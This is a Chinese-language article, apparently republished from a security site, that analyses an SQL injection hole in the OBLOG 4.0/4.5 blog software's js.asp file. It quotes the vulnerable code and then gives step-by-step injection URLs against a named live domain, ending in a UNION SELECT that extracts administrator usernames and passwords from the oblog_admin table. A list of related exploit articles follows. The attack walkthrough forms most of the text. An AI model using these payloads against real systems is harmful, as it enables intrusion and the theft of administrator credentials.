OBLOG4.0 OBLOG4.5漏洞利用分析_安全相关

来源:Deepen Study

漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”

 ”
 Do While Not rs.Eof
 sAddon=”"
 * sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
 If u=1 Then sAddon=rs(4)
 if t=1 Then
 If sAddon<>“” Then sAddon=sAddon & “,”
 sAddon=sAddon & rs(3)
 End If
 If sAddon<>“” Then sAddon=”(” & sAddon & “)”
 sRet=sRet & sAddon & “

 ”
 rs.Movenext
 Loop
 Set rs = Nothing
 sRet=sRet & “


Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1

Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write('

*

‘);

gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1 

时间: 2024-09-14 03:15:07

OBLOG4.0 OBLOG4.5漏洞利用分析_安全相关的相关文章

“cerber”敲诈者对CVE-2016-7255漏洞利用分析

本文讲的是"cerber"敲诈者对CVE-2016-7255漏洞利用分析, 0x1 前言 360互联网安全中心近日捕获到一款"ceber"敲诈者木马变种,该变种与其他"ceber"敲诈者木马变种在代码执行流程上并没有太大区别.唯一值得注意的是,该木马利用CVE-2016-7255权限提升漏洞对自身进行提权.本文将分析该敲诈者对CVE-2016-7255权限提升漏洞的利用过程. 0x2 漏洞细节 出问题的代码位于win32k!xxxNextWind

Dedecms getip()的漏洞利用代码_安全教程

author: superhei team:http://www.ph4nt0m.org blog:http://superhei.blogbus.com 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php function FushCache($mid=0) { if(empty($mid)) $mid = $this->M_ID; $dsql = new DedeSql(); $row = $dsql->GetOne("Select ID,

小议yxbbs漏洞利用代码_漏洞研究

1.任意文件下载漏洞. 漏洞文件: ViewFile.asp Function ChkFile(FileName)  Dim Temp,FileType,F  ChkFile=false  FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,"."))))  Temp="|asp|aspx|cgi|php|cdx|cer|asa|"  If Instr(Temp,"|&quo

eWebEditorNet漏洞利用思路_网络安全

打开eWebEditorNet/upload.aspx,选择一个cer文件.再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了.查看源码就可以看到上传shell的地址.注意:此文章已发表在2007年12月<<黑客手册>> 转载请著名出自 雕牌's blog 52cmd.cn 已经3个月的大学生活了,一直忙,所以没写文章了,星期天正好整理资料,朋友发来一网站喊帮忙入侵一下,正好闲着,就开始了入侵之路.一,初窥门径网站是http:/

eWebSoft在线编辑器漏洞利用技巧_漏洞研究

现在eWebSoft在线编辑器用户越来越多,  危害就越来越大~  转载标明:  作者:badwolf  出处:坏狼安全网  http://www.winshell.cn/  首先介绍编辑器的一些默认特征:  默认登陆admin_login.asp  默认数据库db/ewebeditor.mdb   默认帐号admin 密码admin或admin888  搜索关键字:"inurl:ewebeditor" 关键字十分重要  有人搜索"eWebEditor - eWebSoft在

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码_安全教程

复制代码 代码如下: <?php  if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}  $scode =  "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".  "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x

新欢乐时光代码分析_安全相关

<% Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk Sub KJ_start()     ' 初始化变量     KJSetDim()     ' 初始化环境     KJCreateMilieu()     ' 感染本地或者共享上与html所在目录     KJLikeIt()     ' 通过vbs感染Outlook邮件模板     KJCrea

我和expression的日与被日 经典分析_安全相关

by jno 2007-11-29 http://www.ph4nt0m.org 当你第一次用expression方式来xss时,你肯定傻眼了,不停弹框,没法关闭浏览器,最终你只能祭出任务管理器将进程结束.也许你其他TAB页正有填到一半尚未提交的表单,你就这样被expression给日了,心里非常郁闷,于是就要想办法干它. 很多人第一反应就是cookie,没错这是个好办法: <div style="width: expression(if(document.cookie.indexOf('

CVE-2013-2551样本分析及漏洞利用和防御

本文讲的是CVE-2013-2551样本分析及漏洞利用和防御, 0x0 写在前面 VUPEN团队在Pwn2Own 2013黑客大赛上使用漏洞攻破Windows 8环境下的IE10,随后在其博客上公开了技术细节.根据VUPEN描述,该漏洞产生于VGX.DLL模块,在VML语言中处理图形标签的stroke子元素的dashstyle存在安全隐患 微软在安全公告MS13-037中详细列举了受影响软件范围从IE6-IE10,并给出相应平台的安全更新 本文调试的Poc由4B5F5F4B根据VUPEN在博客中